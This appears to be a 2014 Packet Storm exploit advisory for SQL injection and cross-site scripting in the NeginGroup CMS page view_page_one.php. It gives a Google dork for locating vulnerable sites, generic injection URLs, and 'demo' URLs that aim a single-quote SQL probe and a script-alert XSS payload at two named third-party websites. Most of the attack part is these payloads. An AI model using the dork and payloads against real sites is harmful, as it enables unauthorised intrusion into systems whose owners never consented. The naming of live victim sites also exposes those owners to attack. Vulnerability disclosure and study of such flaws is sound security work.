Sites created by NeginGroup suffer from cross site scripting and remote SQL injection vulnerabilities. Note that this finding houses site-specific data.
73bf857fa364642f3fa21c1fb9d3e05d25d39ed86e9f9879052560a5cb108b6f[+] Title: Sql Injection / Xss on NeginGroup CMS
[+] Date: 2014/5/29
[+] Author: Hekt0r
[+] Vendor Homepage: www.NeginGroup.com
[+] Tested on: Windows 7 & Kali Linux
[+] Vulnerable File: /view_page_one.php
[+} Dork : intext:www.NeginGroup.com
inurl:/view_page_one.php?v=
### Exploitation:
[+] Exploit Sql Injection: http://site/view_page_one.php?v=[SQL-Injection]
[+] Exploit Xss: http://site/view_page_one.php?v=[Xss]
### Demo:
[+] Sqli:http://www.irantwins.com/view_page_one.php?v=1'
http://jovainco.com/view_page_one.php?v=3'
[+] Xss: http://www.irantwins.com/view_page_one.php?v=
<script>alert(/Xss/)</script>
http://jovainco.com/view_page_one.php?v=
<script>alert(/Xss/)</script>
[+] Special Thanks: Root
SmasheR,Mr.Moein,UmPire,Saeed.Jok3r,M4hdi,ALIREZA_PROMIS,LiNuX-LoVeR And
All members of Iran Security Group
[+] iransec.net
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed